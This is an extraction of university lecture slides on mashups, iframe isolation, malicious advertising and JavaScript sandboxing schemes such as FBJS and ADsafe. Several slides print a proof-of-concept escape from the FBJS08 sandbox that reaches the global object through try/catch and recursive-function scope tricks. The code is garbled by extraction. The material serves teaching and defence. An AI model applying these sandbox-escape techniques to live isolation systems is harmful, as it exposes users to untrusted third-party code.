Mashups and Language-Based Isolation

1
Mashups and Language-Based Isolation
CS 142
Winter 2009

• John Mitchell

2
Mashups
3
Advertisements
4
(No Transcript)
5
Social Networking Sites
6
Third-party content Ads
Customer accounts
Advertising network
7
Third-party content Apps
User data
User-supplied application
8
Why Use Frames

• Isolation
• Different frames can represent different
  principals
• Same-origin policy frame can only read or modify
  frames from same scheme/host/port
• Delegation
• Frame can draw only on its own rectangle
• Modularity
• Reuse the same content in multiple places
• Failure containment
• Parent may work even if frame is slow to load or
  broken

src google.com/ name awglogin
src 7.gmodules.com/... name remote_iframe_7
9
Why Not To Use Frames

• Inconvenient
• Container does fit content
• Quirky browser behavior (history, sound)
• Performance impact
• Security Concerns
• Frame hijacking
• Browser exploits
• Inability to Communicate
• Cannot send messages to cross-domain frames
• Alternatives
• Flash
• Rewriting FBJS, ADsafe, Caja

10
postMessage

• frames0.postMessage("Hello world.")
• document.addEventListener("message", receiver)
• function receiver(e)
• if (e.domain "example.com")
• if (e.data "Hello world")
• e.source.postMessage("Hello", e.domain,
  e.uri)

11
Referer Suppression Experiment
Remember this from Lecture 12 by Collin?

• Measure how often Referer suppressed
• Placed a JavaScript advertisement for 200
• 283,945 impressions

12
How does this work?
Advertiser
Ad Network
Publisher
Browser
Content
Content
Ad
Ad
Ad
Ad
13
Zero-click attacks

• Clients vulnerable
• Malware can attack browser implementation errors
• Browser-resident malware can use intended
  functionality to carry out malicious attacts
• Easy to place
• 30 in advertisements reach 50,000 browsers

• Brian Krebs on Computer Security
• Hackers Exploit Adobe Reader Flaw
• Security Fix has learned that security hole in
  Adobe Reader is actively being exploited to
  break into Microsoft Windows computers.
• According to information released Friday by
  iDefense, Web site administrators spotted
  hackers taking advantage of the flaw on Jan. 20,
  2008, when tainted banner ads were identified
  that served specially crafted Acrobat PDF files
  designed to exploit the hole and install
  malicious software .

Ad serves PDF file that installs Zonebac,
modifies search engine results
14
Problems with advertisements

• Ad network, publisher have incentives to show ads
• Could place ads in iframe
• Rules out more profitable floating ads, etc.
• Ad network and publisher can try to screen ads
• Yahoo! AdSafe
• Google Caja
• Some limitations in current web
• Ads may contain links to images that are part
  of ad
• Important to remember
• This is a very effective way to reach victims
  30-50 per 1000
• User does not have to click on anything to run
  malicious code

15
Sandbox

• A safe place for kids to play without hurting
  each other or anyone else

16
Possible approach

• Goal
• Write a static analyzer to check untrusted
  JavaScript and determine if it is malicious
• Solvable?
• Very difficult because of functions that can
  convert string to code and vice versa, for eg
  eval
• More likely to have a solution
• Find a well-defined and meaningful subset of
  JavaScript for which this is solvable
• Prohibit problematic functions like eval

17
Some JavaScript examples

• Use of this inside functions
• Implicit conversions

var b 10 var f function() var b
5 function g()var b 8 return
this.b g() var result f()
// has as value 10
var y "a" var x toString function()
return y x x 10 jsgt "a10"
// implicit call toString
18
Sometimes tricky

• Which declaration of g is used?
• String computation of property names
• for (p in o)...., eval(...), os allow strings
  to be used as code and vice versa

var f function() var a g() function g()
return 1 function g() return 2 var g
function() return 3 return a var result
f()
// has as value 2
var m "toS" var n "tring" Object.prototypem
n function()return undefined
19
Facebook FBJS

• Subset of JavaScript for Facebook applications
• Application code is fetched from the publisher's
  (untrusted) server and embedded as a subtree of
  the page.
• Not placed in an Iframe.
• Application code written is statically checked to
  see if it is valid FBJS
• FBJS code is re-written and certain run-time
  checks are added

20
FBJS restrictions

• Security Goal
• Restrict access Document Object Model (DOM),
  global object
• Prevent clashes with other applications
• Method 1 Filtering
• Forbid eval, with
• Disallow explicit access to properties (via the
  dot notation o.p) valueOf, __parent__ ,
  constructor.
• Method 2 Rewriting
• Add application specific prefix to all top-level
  identiers.
• Example o.p is renamed to a1234_o.p
• Separate effective namespace of an application
  from others

21
More about FBJS08

• Some details of rewriting
• this is re-written to ref(this)
• ref is a function dened by the host (Facebook) in
  the global object
• ref(x) x if x 6 window else ref(x) null
• Prevents application code form accessing the
  global object.
• op gets rewritten to oidx(p).
• Returns error if p is a black-listed property,
  such as "__x__
• Facebook also provides libraries
• accessible within the application namespace,
  allow applications to safely access certain parts
  of the global object.

22
Problem with FBJS08

• Attack
• Get a handle to the global object in the
  application code
• Almost works
• var getthis function() return this
• Except that
• this gets re-written to ref(this) and the code
  returns null.
• But we can redefine ref itself
• ref is defined in the global object and
  application code is disallowed from having handle
  to global object
• But can define a local ref in a local scope and
  defeat FBJS08
• try throw (function() return this)
• catch (f) curr scp f()

23
(No Transcript)
24
Exploit code (now fixed!)
lta href"" onclick"b()"gtTest B (Safari, Opera
and Chrome)lt/agt ltscriptgt function b() try
throw (function()return this)
catch (get_scope)get_scope().reffunction(x)retu
rn x this.alert("Hacked!")
lt/scriptgt
lta href"" onclick"a()"gtTest A (Firefox and
Safari)lt/agt ltscriptgt var get_win function
get_scope(x) if (x0) return
this else get_scope(0).reffunct
ion(x)return x return
get_win(0) function a()get_win(1).alert("Hacke
d!") lt/scriptgt
25
Attack 1
try throw (function()return this) catch
(get_scope)get_scope().reffunction(x)return x

• ECMA-262 semantics for try... catch(f)...
  says that whenever an exception is thrown
• New object o is created with property f pointing
  to the exception object
• o is placed on top of the scope chain. (o does
  not have the activation object status).
• The "this" of a function not defined in an
  activation object is the object containing it. In
  code above, this for get_scope resolves to o.
• Shadow the original ref by re-defining it in o.

26
Attack 2
var get window function f(x) if (x0)
return this else f(x-1)

• ECMA-262 says that whenever a named recursive
  function f is created then the internal scope
  chain (fscp) of the function (environment pointer
  of the closure) is set to the current lexical
  scope with a dummy object (of) placed on top.

27
Attack 2
var get window function f(x) if (x0)
return this else f(x-1)

• When the function f is called, the current scope
  chain is replaced with fscp and an activation
  object for f is placed on top of it
• Every recursive call to f will resolve to
  property f of the dummy object of (which is not
  an activation object)
• Accessing this inside f will resolve to of
• Shadow the original ref by redefining it in of

28
What is possible?

• Filtering principle
• Subset of JavaScript if program accesses
  property p, either p appears textually in
  program, or is from list of implicit properties
• Isolation principle 1
• Subset of JavaScript semantics-preserving
  capture-avoiding renaming of identifiers (except
  names of predefined properties)
• Isolation principle 2
• Subset of JavaScript no program can access any
  scope object
• Isolation principle 3
• Given a lists of forbidden properties PnoW and
  PnoRW , cannot write properties in PnoW and
  cannot read or write properties in PnoRW
• Rewriting principles
• Achieve some forms of isolation by restricting
  semantics

29
Isolation of property names (Jt)

• Goal
• All property names that get accessed must appear
  textually in the code
• If the program does not contain
• eval, Function, o.. etc which convert string to
  code
• Then any property accessed is either in code or
• an implicit property access toString, toNumber,
  valueOf, length, prototype, constructor, message,
  arguments, Object, Array
• Application
• If we want to prevent access to certain
  properties, restrict to this sublanguage Jt and
  inspect code

30
Isolating scope objects (Js)

• How can code in subset Jt access scope objects?
• Identifier this
• Object.prototype.valueOf, Array.prototype.sort
  /concat/reverse can implicitly access this
• Define subst Js of Jt
• Prohibit this, valueOf, sort, concat and reverse
• Properties of Js
• Programs cannot access scope object
• Can rename variables variable names can never be
  accessed (explicitly) as properties
• But not variable with same name as native
  properties

31
Example

• Security Goal
• Restrict access Document Object Model (DOM),
  global object
• Method 1 Filtering
• Forbid eval, with, ...
• Method 2 Require special program idioms
• Access property p of object o by calling
  ADSAFE.get(o, p)

32
Subtlety

• AdSafe restriction
• "All interaction with the trusted code must
  happen only using the methods in the ADSafe
  object."
• This may not be possible !
• // Somewhere in trusted code
• Object.prototype.toString function() ...
• ...
• // Untrusted code
• var o
• o o // converts o to String

Bottom line need to restrict definitions that
occur in trusted code
33
Possible approach

• Analyze the library of the host page
• Compute a blacklist PnoRW of security-critical
  properties that could lead to security breach
  (How?)
• Use subset Js Filter for PnoRW

34
Conclusion

• Modern sites incorporate third-party content
• Advertisements
• Applications
• Third-party content must be isolated
• Or expose everyone to easy malicious attacks
• Two basic approaches
• Use browser mechanism, such as iframes
• Filter, rewrite, and restrict execution of
  untrusted content
• Language-based sandboxing is tricky
• Subtle problems with recent methods
• Progress on reliable foundations is possible

35
(No Transcript)
36
(No Transcript)
37
Web Advertising

• Deliver advertisements to viewers via Web
• More effective and more profitable if user
  profile is known

Source U Texas iSchool student study,
www.ischool.utexas.edu/i385e/studentsPPT/fogle_IA
WebAdv.ppt
38
Web ad placement and type

• Ad positions
• Dark orange (strong), light yellow (weak)
• Ads near rich content and navigation, and at the
  top-left do better
• Ad types
• Banner
• Sidebar
• Pop-ups, pop-unders
• Floating
• Unicast

39
Banner

• HTML code loads a specific website
• Varies in content and shape
• Horizontal
• 50 cents/ 1000

40
Sidebar

• Skyscraper
• Vertical
• 2-3 times larger than banner
• Harder to scroll it off page
• 1.00 - 1.50/ 1000

41
Pop-ups

• Opens in its own window
• Obscures the page your viewing
• Forced to close or move it

42
Pop-unders

• Opens under the content your viewing
• Less intrusive than pop-up
• Both are more effective than banner
• Banners 2-5 clicks/ 1000
• Pop-ups 30 clicks/ 1000
• Can cost 4-10 times more than banner

43
Floating

• Float or fly over page 5-30s
• Obscure view block mouse input
• Gets attention animation sound
• Powerful branding tool - hard to ignore
• 30 clicks/1000
• 3 - 30/ 1000

44
Unicast

• TV commercials that run in pop-up
• 10-30s
• Same branding power as TV commercial being able
  to go to website
• 50 clicks/1000
• 30/1000

From AOL.com
45
Web Publishing and Advertising
Advertiser
Ad Network
Publisher
Browser
Content
Content
Ad
Ad
Ad
Ad